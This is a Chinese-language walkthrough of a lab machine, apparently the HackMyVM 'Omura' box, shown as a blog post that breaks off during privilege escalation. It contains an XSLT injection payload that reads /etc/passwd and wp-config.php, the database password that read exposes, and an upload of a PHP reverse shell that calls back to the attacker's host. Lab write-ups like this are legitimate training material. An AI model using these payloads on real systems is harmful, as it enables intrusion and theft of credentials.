{"id":636,"date":"2024-04-26T20:38:27","date_gmt":"2024-04-26T12:38:27","guid":{"rendered":"http:\/\/162.14.82.114\/?p=636"},"modified":"2024-04-26T20:39:34","modified_gmt":"2024-04-26T12:39:34","slug":"hmv-_-omura","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/636\/04\/26\/2024\/","title":{"rendered":"hmv[-_-]Omura"},"content":{"rendered":"

Omura<\/h1>\n

\"image-20240426175800955\"<\/div><\/p>\n

\"image-20240426180016872\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ sudo nmap -sS 192.168.0.145\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 06:00 EDT\nNmap scan report for omura (192.168.0.145)\nHost is up (0.000088s latency).\nNot shown: 997 closed tcp ports (reset)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n80\/tcp   open  http\n3260\/tcp open  iscsi\nMAC Address: 08:00:27:EA:9B:1A (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ rustscan -a 192.168.0.145 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.145:22\nOpen 192.168.0.145:80\nOpen 192.168.0.145:3260\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 06:00 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 06:00\nCompleted NSE at 06:00, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 06:00\nCompleted NSE at 06:00, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 06:00\nCompleted NSE at 06:00, 0.00s elapsed\nInitiating Ping Scan at 06:00\nScanning 192.168.0.145 [2 ports]\nCompleted Ping Scan at 06:00, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 06:00\nCompleted Parallel DNS resolution of 1 host. at 06:00, 4.03s elapsed\nDNS resolution of 1 IPs took 4.03s. Mode: Async [#: 3, OK: 1, NX: 0, DR: 0, SF: 0, TR: 2, CN: 0]\nInitiating Connect Scan at 06:00\nScanning omura (192.168.0.145) [3 ports]\nDiscovered open port 22\/tcp on 192.168.0.145\nDiscovered open port 80\/tcp on 192.168.0.145\nDiscovered open port 3260\/tcp on 192.168.0.145\nCompleted Connect Scan at 06:00, 0.00s elapsed (3 total ports)\nInitiating Service scan at 06:00\nScanning 3 services on omura (192.168.0.145)\nCompleted Service scan at 06:02, 93.64s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.145.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 06:02\nCompleted NSE at 06:02, 1.40s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 06:02\nCompleted NSE at 06:02, 0.06s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 06:02\nCompleted NSE at 06:02, 0.01s elapsed\nNmap scan report for omura (192.168.0.145)\nHost is up, received syn-ack (0.00041s latency).\nScanned at 2024-04-26 06:00:42 EDT for 96s\n\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp   open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: XSLT Transformation\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n3260\/tcp open  iscsi   syn-ack Synology DSM iSCSI\n| iscsi-info: \n|   iqn.2023-02.omura.hmv:target01: \n|     Address: 192.168.0.145:3260,1\n|     Authentication: required\n|_    Auth reason: Authorization failure\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 06:02\nCompleted NSE at 06:02, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 06:02\nCompleted NSE at 06:02, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 06:02\nCompleted NSE at 06:02, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 99.81 seconds<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Omura]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.145 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.145\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,zip,bak,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.php            (Status: 200) [Size: 795]\n\/.php                 (Status: 403) [Size: 278]\n\/process.php          (Status: 200) [Size: 0]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240426180320785\"<\/div><\/p>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
\n
\u5728\u8ba1\u7b97\u9886\u57df\uff0ciSCSI<\/strong>\u662f  Internet Small Computer Systems Interface<\/strong>\u7684\u7f29\u5199\uff0c\u5b83\u662f\u4e00\u79cd\u57fa\u4e8e Internet \u534f\u8bae (IP) \u7684\u5b58\u50a8\u7f51\u7edc\u6807\u51c6\uff0c\u7528\u4e8e\u94fe\u63a5\u6570\u636e\u5b58\u50a8\u8bbe\u65bd\u3002\u5b83\u901a\u8fc7 TCP\/IP \u7f51\u7edc\u4f20\u9001 SCSI \u547d\u4ee4\u6765\u63d0\u4f9b\u5bf9\u5b58\u50a8\u8bbe\u5907\u7684\u5757\u7ea7\u8bbf\u95ee\u3002 iSCSI \u7528\u4e8e\u4fc3\u8fdb\u901a\u8fc7 Intranet \u7684\u6570\u636e\u4f20\u8f93\u4ee5\u53ca\u7ba1\u7406\u957f\u8ddd\u79bb\u5b58\u50a8\u3002\u5b83\u53ef\u7528\u4e8e\u901a\u8fc7\u5c40\u57df\u7f51 (LAN)\u3001\u5e7f\u57df\u7f51 (WAN) \u6216 Internet \u4f20\u8f93\u6570\u636e\uff0c\u5e76\u4e14\u53ef\u4ee5\u5b9e\u73b0\u4e0e\u4f4d\u7f6e\u65e0\u5173\u7684\u6570\u636e\u5b58\u50a8\u548c\u68c0\u7d22\u3002<\/p>\n
\u8be5\u534f\u8bae\u5141\u8bb8\u5ba2\u6237\u7aef\uff08\u79f0\u4e3a\u53d1\u8d77\u65b9\uff09\u5411\u8fdc\u7a0b\u670d\u52a1\u5668\u4e0a\u7684\u5b58\u50a8\u8bbe\u5907\uff08\u76ee\u6807\uff09\u53d1\u9001 SCSI \u547d\u4ee4 (CDB)\u3002\u5b83\u662f\u4e00\u79cd\u5b58\u50a8\u533a\u57df\u7f51\u7edc (SAN) \u534f\u8bae\uff0c\u5141\u8bb8\u7ec4\u7ec7\u5c06\u5b58\u50a8\u6574\u5408\u5230\u5b58\u50a8\u9635\u5217\u4e2d\uff0c\u540c\u65f6\u4e3a\u5ba2\u6237\u7aef\uff08\u4f8b\u5982\u6570\u636e\u5e93\u548c Web \u670d\u52a1\u5668\uff09\u63d0\u4f9b\u672c\u5730\u8fde\u63a5\u7684 SCSI \u78c1\u76d8\u7684\u9519\u89c9\u3002\u5b83\u4e3b\u8981\u4e0e\u5149\u7ea4\u901a\u9053\u7ade\u4e89\uff0c\u4f46\u4e0e\u901a\u5e38\u9700\u8981\u4e13\u7528\u5e03\u7ebf\u7684\u4f20\u7edf\u5149\u7ea4\u901a\u9053\u4e0d\u540c\uff0ciSCSI \u53ef\u4ee5\u4f7f\u7528\u73b0\u6709\u7f51\u7edc\u57fa\u7840\u8bbe\u65bd\u957f\u8ddd\u79bb\u8fd0\u884c\u3002<\/p>\n<\/blockquote>\n
\u6f0f\u6d1e\u5229\u7528<\/h3>\n
\u5c1d\u8bd5\u67e5\u8be2\u4e00\u4e0b\uff1a<\/p>\n
\n
https:\/\/book.hacktricks.xyz\/pentesting-web\/xslt-server-side-injection-extensible-stylesheet-language-transformations<\/a><\/p>\n
https:\/\/book.hacktricks.xyz\/pentesting-web\/xslt-server-side-injection-extensible-stylesheet-language-transformations#read-local-file<\/a><\/p>\n<\/blockquote>\n
\"image-20240426182107955\"<\/div><\/p>\n
\u968f\u4fbf\u4e00\u4e2axml<\/h4>\n
<?xml version="1.0" encoding="UTF-8"?>\n<catalog>\n    <cd>\n        <title>CD Title<\/title>\n        <artist>The artist<\/artist>\n        <company>Da Company<\/company>\n        <price>10000<\/price>\n        <year>1760<\/year>\n    <\/cd>\n<\/catalog><\/code><\/pre>\n
\u518d\u5c1d\u8bd5xsl\uff01<\/p>\n
<xsl:stylesheet xmlns:xsl="http:\/\/www.w3.org\/1999\/XSL\/Transform" xmlns:abc="http:\/\/php.net\/xsl" version="1.0">\n<xsl:template match="\/">\n<xsl:value-of select="unparsed-text('\/etc\/passwd', 'utf-8')"\/>\n<\/xsl:template>\n<\/xsl:stylesheet><\/code><\/pre>\n
\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n
http:\/\/192.168.0.145\/process.php<\/code><\/pre>\n
root:x:0:0:root:\/root:\/bin\/bashdaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologinbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologinsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologinsync:x:4:65534:sync:\/bin:\/bin\/syncgames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologinman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologinlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologinmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologinnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologinuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologinproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologinwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologinbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologinlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologinirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologinnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologinsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologinsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologinmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologinsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologinavahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologinsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologinsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologinmysql:x:107:115:MySQL Server,,,:\/nonexistent:\/bin\/falseford:x:1000:1000:,,,:\/home\/ford:\/bin\/bash<\/code><\/pre>\n
\u770b\u6765\u662f\u53ef\u884c\u7684\uff01\u4fee\u6539\u4e00\u4e0b\uff0c\u8bfb\u53d6\u4e00\u4e0b\u76f8\u5173\u6587\u4ef6\uff01\uff01\uff01\uff01<\/p>\n
http:\/\/192.168.0.145\/process.php<\/code><\/pre>\n
\/var\/www<\/code><\/pre>\n
htmlwordpress<\/code><\/pre>\n
\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u7684\u6587\u4ef6\uff1a<\/p>\n
http:\/\/192.168.0.145\/process.php<\/code><\/pre>\n
index.phplicense.txtreadme.htmlwordpresswp-activate.phpwp-adminwp-blog-header.phpwp-comments-post.phpwp-config.phpwp-contentwp-cron.phpwp-includeswp-links-opml.phpwp-load.phpwp-login.phpwp-mail.phpwp-settings.phpwp-signup.phpwp-trackback.phpxmlrpc.php<\/code><\/pre>\n
\u5b58\u5728\u51e0\u4e2a\u654f\u611f\u6587\u4ef6wp-config.php<\/code>\u8fd8\u6709wp-login.php<\/code>\u4ee5\u53cawp-settings.php<\/code>\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
<?php \/\/ ** Database settings - You can get this info from your web host ** \/\/ \/** The name of the database for WordPress *\/ define( 'DB_NAME', 'wordpressdb' ); \/** Database username *\/ define( 'DB_USER', 'admin' ); \/** Database password *\/ define( 'DB_PASSWORD', 'dw42k25MiXT' ); \/** Database hostname *\/ define( 'DB_HOST', 'localhost' ); \/** Database charset to use in creating database tables. *\/ define( 'DB_CHARSET', 'utf8' ); \/** The database collate type. Don't change this if in doubt. *\/ define( 'DB_COLLATE', '' ); \/**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 *\/ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' ); \/**#@-*\/ \/** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! *\/ $table_prefix = 'wp_'; \/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https:\/\/wordpress.org\/support\/article\/debugging-in-wordpress\/ *\/ define( 'WP_DEBUG', false ); \/* Add any custom values between this line and the "stop editing" line. *\/ \/* That's all, stop editing! Happy publishing. *\/ \/** Absolute path to the WordPress directory. *\/ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '\/' ); } \/** Sets up WordPress vars and included files. *\/ require_once ABSPATH . 'wp-settings.php';<\/code><\/pre>\n
\u627e\u5230\u8d26\u6237\u5bc6\u7801\uff1a<\/p>\n
admin\ndw42k25MiXT<\/code><\/pre>\n
\u5c1d\u8bd5dns<\/h3>\n
\u5f97\uff0c\u80af\u5b9a\u53c8\u52a0dns\u4e86\u3002\u3002\u3002\u3002\u3002\u6dfb\u52a0dns\uff1a<\/p>\n
192.168.0.145   omura.hmv<\/code><\/pre>\n
\u7136\u540efuzz\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# wfuzz -u http:\/\/omura.hmv -H "Host: FUZZ.omura.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt --hw 76\n \/usr\/lib\/python3\/dist-packages\/wfuzz\/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/omura.hmv\/\nTotal requests: 114441\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                \n=====================================================================\n\n000000326:   200        127 L    1303 W     28732 Ch    "wordpress"\n000009532:   400        10 L     35 W       301 Ch      "#www"\n000010581:   400        10 L     35 W       301 Ch      "#mail"\n000047706:   400        10 L     35 W       301 Ch      "#smtp"\n000103135:   400        10 L     35 W       301 Ch      "#pop3"\n\nTotal time: 95.63769\nProcessed Requests: 114441\nFiltered Requests: 114436\nRequests\/sec.: 1196.609<\/code><\/pre>\n
\u679c\u7136\uff0c\u6dfb\u52a0dns\u3002\u3002\u3002<\/p>\n
192.168.0.145   omura.hmv wordpress.omura.hmv<\/code><\/pre>\n
\u5c1d\u8bd5\u4e00\u4e0b\u5e38\u89c1\u767b\u5f55\u9875\u9762\uff0c\u8fdb\u6765\u4e86\uff1a<\/p>\n
\"image-20240426185002701\"<\/div><\/p>\n
\u5c1d\u8bd5\u4f7f\u7528\u521a\u521a\u5f97\u5230\u7684\u8d26\u53f7\u5bc6\u7801\u767b\u5f55\uff1a<\/p>\n
\"image-20240426185055972\"<\/div><\/p>\n
\u4e0a\u4f20\u53cd\u5f39shell\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Downloads]\n\u2514\u2500$ vim revershell.php \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Downloads]\n\u2514\u2500$ head revershell.php\n\n  <?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = "1.0";\n  $ip = '192.168.0.143';  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n
\u4e0a\u4f20\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240426185458352\"<\/div><\/p>\n
\u663e\u793a\u9519\u4e86\uff1a<\/p>\n
\"image-20240426185527692\"<\/div><\/p>\n
\u4f46\u662f\u786e\u5b9e\u4f20\u4e0a\u53bb\u4e86.<\/p>\n
\"image-20240426185815212\"<\/div><\/p>\n
\u8bbe\u7f6e\u76d1\u542c\u5e76\u6fc0\u6d3b\uff01<\/p>\n
\"image-20240426185908375\"<\/div><\/p>\n
\u62ff\u4e0bshell\uff01\uff01\uff01<\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@omura.hmv:\/$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@omura.hmv:\/$ ls \nbin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz\nboot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old\n(remote) www-data@omura.hmv:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/umount\n(remote) www-data@omura.hmv:\/$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@omura.hmv:\/$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port\nudp            UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*\ntcp            LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*\ntcp            LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*\ntcp            LISTEN          0               256                            0.0.0.0:3260                        0.0.0.0:*\ntcp            LISTEN          0               511                                  *:80                                *:*\ntcp            LISTEN          0               128                               [::]:22                             [::]:*<\/code><\/pre>\n
\u989d\uff0c\u597d\u50cf\u8fd9\u4e2a3260<\/code>\u670d\u52a1\u8fd8\u6ca1\u7528\u4e0a\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
https:\/\/book.hacktricks.xyz\/network-services-pentesting\/3260-pentesting-iscsi#enumeration<\/a><\/p>\n
\u53bb\u7ffb\u4e00\u4e0b\u6587\u4ef6\uff1a<\/p>\n
(remote) www-data@omura.hmv:\/$ cd \/etc\/iscsi\/\nbash: cd: \/etc\/iscsi\/: No such file or directory<\/code><\/pre>\n
\u5636\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u5bfb\u627e\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
(remote) www-data@omura.hmv:\/$ find \/ -name "*iscsi*" 2>\/dev\/null\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/target\/iscsi\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/target\/iscsi\/iscsi_target_mod.ko\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/firmware\/iscsi_ibft.ko\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/scsi\/libiscsi_tcp.ko\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/scsi\/iscsi_boot_sysfs.ko\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/scsi\/scsi_transport_iscsi.ko\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/scsi\/be2iscsi\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/scsi\/be2iscsi\/be2iscsi.ko\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/scsi\/iscsi_tcp.ko\n\/usr\/lib\/modules\/5.10.0-21-amd64\/kernel\/drivers\/scsi\/libiscsi.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/target\/iscsi\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/target\/iscsi\/iscsi_target_mod.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/firmware\/iscsi_ibft.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/scsi\/libiscsi_tcp.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/scsi\/iscsi_boot_sysfs.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/scsi\/scsi_transport_iscsi.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/scsi\/be2iscsi\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/scsi\/be2iscsi\/be2iscsi.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/scsi\/iscsi_tcp.ko\n\/usr\/lib\/modules\/5.10.0-20-amd64\/kernel\/drivers\/scsi\/libiscsi.ko\n\/usr\/share\/bash-completion\/completions\/iscsiadm\n\/var\/lib\/iscsi_disks\n\/sys\/kernel\/config\/target\/iscsi\n\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/tpgt_1\/acls\/iqn.2023-02.omura.hmv:node01.initiator01\/fabric_statistics\/iscsi_sess_stats\n\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/fabric_statistics\/iscsi_logout_stats\n\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/fabric_statistics\/iscsi_login_stats\n\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/fabric_statistics\/iscsi_tgt_attr\n\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/fabric_statistics\/iscsi_sess_err\n\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/fabric_statistics\/iscsi_instance\n\/sys\/module\/iscsi_target_mod\n\/sys\/module\/target_core_mod\/holders\/iscsi_target_mod\n\/sys\/module\/configfs\/holders\/iscsi_target_mod\n(remote) www-data@omura.hmv:\/$ cat \/sys\/kernel\/config\/target\/iscsi\ncat: \/sys\/kernel\/config\/target\/iscsi: Is a directory\n(remote) www-data@omura.hmv:\/$ cd \/sys\/kernel\/config\/target\/iscsi\n(remote) www-data@omura.hmv:\/sys\/kernel\/config\/target\/iscsi$ ls -la\ntotal 0\ndrwxr-xr-x 4 root root    0 Apr 26 13:02 .\ndrwxr-xr-x 4 root root    0 Apr 26 13:02 ..\ndrwxr-xr-x 2 root root    0 Apr 26 13:02 discovery_auth\ndrwxr-xr-x 4 root root    0 Apr 26 11:58 iqn.2023-02.omura.hmv:target01\n-r--r--r-- 1 root root 4096 Apr 26 13:24 lio_version\n(remote) www-data@omura.hmv:\/sys\/kernel\/config\/target\/iscsi$ cat \/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/tpgt_1\/acls\/iqn.2023-02.omura.hmv:node01.initiator01\/fabric_statistics\/iscsi_sess_stats\ncat: '\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/tpgt_1\/acls\/iqn.2023-02.omura.hmv:node01.initiator01\/fabric_statistics\/iscsi_sess_stats': Is a directory\n(remote) www-data@omura.hmv:\/sys\/kernel\/config\/target\/iscsi$ cd \/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/tpgt_1\/acls\/iqn.2023-02.omura.hmv:node01.initiator01\/fabric_statistics\/iscsi_sess_stats\n(remote) www-data@omura.hmv:\/sys\/kernel\/config\/target\/iscsi\/iqn.2023-02.omura.hmv:target01\/tpgt_1\/acls\/iqn.2023-02.omura.hmv:node01.initiator01\/fabric_statistics\/iscsi_sess_stats$ ls -la\ntotal 0\ndrwxr-xr-x 2 root root    0 Apr 26 13:02 .\ndrwxr-xr-x 3 root root    0 Apr 26 11:58 ..\n-r--r--r-- 1 root root 4096 Apr 26 13:25 cmd_pdus\n-r--r--r-- 1 root root 4096 Apr 26 13:25 conn_digest_errors\n-r--r--r-- 1 root root 4096 Apr 26 13:25 